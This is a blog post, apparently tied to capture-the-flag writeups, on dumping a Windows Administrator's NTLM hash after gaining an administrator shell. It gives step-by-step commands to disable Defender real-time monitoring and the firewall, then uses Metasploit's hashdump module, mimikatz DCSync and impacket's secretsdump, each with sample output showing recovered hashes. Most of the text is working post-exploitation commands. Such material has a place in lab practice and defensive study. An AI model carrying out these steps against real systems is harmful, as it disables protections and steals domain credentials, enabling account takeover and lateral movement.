How to dump the ntlm hash of user administrator
How to dump the ntlm hash of user administrator
Cancel

How to dump the ntlm hash of user administrator

Using Metasploit-Hashdump

After getting shell as administrator Do these things.

First disable the real time protection if its enabled

1

Set-MpPreference -DisableRealtimeMonitoring $true
                                                    

Then disable the Anti-Virus protection

1

netsh advfirewall set currentprofile state off
                                                    
  • get a meterpreter shell on the particular Machine

Background the session with ctrl+z

1
2


meterpreter >
Background session 1? [y/N]  y

                                                    

Load the module post/windows/gather/hashdump

1

msf5 exploit(multi/handler) > use post/windows/gather/hashdump
                                                    

List your background sessions

1
2
3
4
5
6
7
8

msf5 post(windows/gather/hashdump) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ MACHINE  10.10.14.X:2345 -> 10.10.10.X:49696 (10.10.10.X)
                                                    

Set your session and run the module

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

msf5 post(windows/gather/hashdump) > set session 1
session => 1
msf5 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d132fb96a18c6ee06dee89f8effb8e06...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:97fc053bc0b23588798277b22540c40d:::

[*] Post module execution completed
                                                    

The hash is divided into 2 parts First one is LM and second one is NTLM

NTLM hash is 97fc053bc0b23588798277b22540c40d

Just copy paste the NTLM hash in the writeup where i asked for it

Using mimikatz

After getting shell as administrator Do these things.

First disable the real time protection if its enabled

1

Set-MpPreference -DisableRealtimeMonitoring $true
                                                    

Then disable the Anti-Virus protection

1

netsh advfirewall set currentprofile state off
                                                    

Then run the mimikatz with following arguments

1

./mimikatz.exe "lsadump::dcsync /user:administrator"
                                                    

You can download mimikatz from Here

You will get output like this

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb  8 2020 12:26:09
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 
Password last change : 1/24/2020 9:14:15 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff
                                                    

And the NTLM hash we got is f9485863c1e9e05851ab40cbb5ab9dff

Just copy paste it in the writeup where i asked for it.

Using Secretdump

If you have owned a machine.And you have the user Administrator's password ,You can get the NTLM hashes of user Administrator using secrectdump .Secretdump is a tool from impacket-tools

1
2
3
4
5
6

secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::
                                                    

The hash is divided into two sections first LM hash and second one is NTLM .

Here we got the NTLM which is d9485863c1b9e07543aa40cbb4ab9dfd Just copy paste it in the writeup where i asked for it.

This post is licensed under CC BY 4.0

-

-

© Dedinfosec . All rights reserved.